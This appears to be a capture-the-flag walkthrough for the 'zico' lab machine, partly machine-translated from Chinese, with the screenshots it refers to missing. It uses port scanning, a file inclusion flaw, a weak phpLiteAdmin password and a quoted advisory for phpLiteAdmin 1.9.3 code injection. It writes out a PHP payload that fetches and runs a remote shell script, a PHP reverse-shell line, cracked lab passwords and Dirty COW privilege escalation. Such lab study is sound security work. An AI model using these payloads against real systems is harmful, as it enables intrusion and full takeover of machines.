Target machine test-zico

collect message

Host discovery

nmap -sV

The destination IP address is 192.168.133.134.

Port scan

Use masscan:

masscan --rate=10000 --port 0-65535 192.168.133.134

Use nmap to detect information such as version:

Probe CMS

Use whatweb:

Directory scan

Vulnerability discovery

It is found that the value of the page variable in the url of this page is an html file.

You can directly access tools.html: it can be accessed directly. It is guessed that file inclusion is used, and there may be a file inclusion vulnerability.

Try it manually:

there is a file inclusion vulnerability.

Exploit

In the directory scan, it is found that there is dbadmin (db-database? admin-familiar admin),
visit:

Open the php file:

database login page, and give the version information.

Try to log in with a weak password:

Successful login with admin:

Obtained information about two users:

Decryption, the final correspondence is:

root–34kroot34
zico–zico2215@

Try ssh remote login:

failure.

Use searchsploit:

view txt content (direct translation):

#漏洞标题：phpliteadmin<=1.9.3远程PHP代码注入漏洞

#谷歌怪人：inurl:phpliteadmin.php文件（默认密码：admin）

#日期：2013年10月1日

#利用作者：L@usch公司- http://la.usch.io-http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt

#供应商主页：http://code.google.com/p/phpliteadmin/

#供应商状态：通知

#软件链接：http://phpliteadmin.googlecode.com/files/phpliteadmin\u v1-9-3.zip

#版本：1.9.3

#测试环境：Windows和Linux



说明：



phpliteadmin.php#1784：'创建新数据库'=>

phpliteadmin.php#1785：'创建新数据库时，如果您自己不包括该数据库，则输入的名称将附加相应的文件扩展名（.db、.db3、.sqlite等）。数据库将在指定为$directory变量的目录中创建。“，



攻击者可以使用php扩展创建sqlite数据库，并将php代码作为文本字段插入。完成后，攻击者只需使用Webbrowser访问数据库文件即可执行该操作。



概念证明：



1我们创建了一个名为“黑客.php".

（取决于服务器配置，有时它将不起作用，数据库的名称将为“黑客.sqlite". 然后尝试将数据库/现有数据库重命名为“黑客.php".)

脚本将sqlite数据库存储在phpliteadmin.php文件.

预览：http://goo.gl/B5n9O

十六进制预览：http://goo.gl/lJ5iQ



2现在在此数据库中创建一个新表，并插入一个具有默认值的文本字段：

<?php phpinfo（）？>

十六进制预览：http://goo.gl/v7USQ



三。现在我们跑黑客.php



多恩

According to the content, test:
Insert phpinfo:

Local inclusion through file inclusion vulnerability:

Return phpinfo information, check the configuration, and remote inclusion is not turned on.

Write the remote download command and download the shell script:

<?php system("wget IP地址/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

-O output to the specified directory.

Output to the /tmp directory because the permissions required for this directory are low.

The content of shell.txt is:

<?php $sock=fsockopen("IP地址",监听端口);exec("/bin/sh -i <&3 >&3 2>&3")?>

If you insert this statement directly into the database for a reverse shell, the connection fails:

So through remote download.

First create the shell.txt file:

Turn on the http service.

insert:

<?php system("wget ​​IP address/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

Perform local inclusion and monitor:

return to the shell successfully.

Right escalation

The password of the root user was obtained through the database before, and an attempt was made to escalate the privilege.

A terminal must be opened here.

Using python, open the terminal:

 python -c 'import pty; pty.spawn("/bin/bash")';

Failed to escalate rights:

Use dirty cattle to escalate rights.

1. Download the dirty cow script file remotely:

Found that the download failed.

View permissions:

give permissions:

enter the tmp directory:

download successfully:

Compile and run:

gcc -pthread dirty.c -o exp -lcrypt //exp is the output file name (fixed format)

Set the password to 123 (optional).

The escalation of rights succeeded.

to sum up

When it is discovered that there may be file containing vulnerabilities, the verification of vulnerabilities should be strengthened.

Learned to use searchsploit to exploit vulnerabilities.

When escalating rights, the use of the /tmp directory should be strengthened.

After the dirty cow succeeds in escalation, the original /etc/passwd must be restored.